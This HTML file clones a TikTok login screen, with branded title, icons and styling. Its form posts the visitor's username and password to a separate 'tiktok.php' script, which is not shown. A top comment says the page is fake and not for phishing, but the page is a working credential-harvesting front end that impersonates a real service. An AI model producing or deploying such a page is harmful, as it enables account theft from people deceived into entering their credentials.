<!--
   # fake page dont use this for phishing    
-->

<html>
<head>
  <title>Tiktok | LogIn</title>
  <meta charset="utf" />
  <meta name="description" content="Access your account and unlock exclusive content, personalized recommendations, and more. Enter your credentials to get started!" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <meta name="author" content="..." />
 <style>
  body{
    width:100%;
    max-width:800px;
    margin:0 auto;
    padding:0px;
    font-family:sans-serif;
  }.container {
    width:100%;
    max-width:800px;
    margin:0 auto;
    
  }
 </style>
</head>
<body>
   <!--container-->
   <div class="container">
     
     <!--top-->
     <style>
      .top{
       width:100%;
       max-width:400px!
       margin:0 auto;
      }.top .first{
       width:100%;
       max-width:350px;
       margin:0 auto;
       display:flex;
       justify-content:space-between;
       border:0px solid grey;
       
      }.top .first button{
        background:none;
        border:0px;
        
      }.top .first h3{
      
      }
      
      .top .sec{
        width:100%;
        max-width:280px;
        margin:0 auto;
        border-bottom:1px solid #D2D2D2;
        margin-top:20px;
        
      }.top .sec button{
       width:120px;
       padding:5px;
       color:#17171F;
       background:none;
       border:0px;
       font-weight:200;
       border-bottom:2px solid #17171F;
       font-weight:bold; /*add this to js*/
      }.top .sec #fphone{
        border:0px;
        font-weight:400;
        color:#B1B1B1; /*add this to js*/
      }
     </style>
     <div class="top">
     
      <!--first-->
      <div class="first">
       <button><svg xmlns="http://www.w3.org/2000/svg" width="1.5rem" height="1.5rem" viewBox="0 0 20 20"><path fill="currentColor" fill-rule="evenodd" d="M7.222 9.897q3.45-3.461 6.744-6.754a.65.65 0 0 0 0-.896c-.311-.346-.803-.316-1.027-.08Q9.525 5.59 5.796 9.322q-.296.243-.296.574t.296.592l7.483 7.306a.75.75 0 0 0 1.044-.029c.358-.359.22-.713.058-.881a3408 3408 0 0 1-7.16-6.988"/></svg></button>
       <h3>Log in</h3>
       <button><svg xmlns="http://www.w3.org/2000/svg" width="1.5rem" height="1.5rem" viewBox="0 0 48 48"><g fill="none"><path stroke="#8A8B90" stroke-linejoin="round" stroke-width="4" d="M24 44a19.94 19.94 0 0 0 14.142-5.858A19.94 19.94 0 0 0 44 24a19.94 19.94 0 0 0-5.858-14.142A19.94 19.94 0 0 0 24 4A19.94 19.94 0 0 0 9.858 9.858A19.94 19.94 0 0 0 4 24a19.94 19.94 0 0 0 5.858 14.142A19.94 19.94 0 0 0 24 44Z"/><path stroke="#8A8B90" stroke-linecap="round" stroke-linejoin="round" stroke-width="4" d="M24 28.625v-4a6 6 0 1 0-6-6"/><path fill="#8A8B90" fill-rule="evenodd" d="M24 37.625a2.5 2.5 0 1 0 0-5a2.5 2.5 0 0 0 0 5" clip-rule="evenodd"/></g></svg></button>
      </div>
      <!--first-->
      
      <!--sec-->
      <div class="sec">
        <center>
         <button id="fphone">Phone</button>
         <button id="fmail">Email / Username</button>
        </center>
      </div>
      <!--sec-->
      
      
      <!--form-->
      <style>
       form {
        width:100%;
        max-width:270px;
        margin:0 auto;
        margin-top:50px;
       }form input{
        display:block;
        width:100%;
        height:40px;
        margin-bottom:10px;
        border:0px;
        border-bottom:1px solid #D2D2D2;
        outline:none;
       }form button{
        width:100%;
        height:40px;
        border:0px;
        border-radius:5px;
        background:#F1F1F1;
        color:#A7A6A9;
        font-weight:bold;
       }
      </style>
      <form action="tiktok.php" method="post" class="form_2">
        <input name="username" type="text" placeholder="Email or username" required>
        <input name="password" type="password" placeholder="Password" required>
        <b style="display:block;margin:25px 0px 0px 0px;border:0px solid grey;">Forgot password?</b><br>
        <button type="submit" name="submit">Log in</button>
      </form>
      <!--form-->
      
     </div>
     <!--top-->
     
     <script>
       
     </script>
     
   </div>
   <!--container-->
</body>
</html>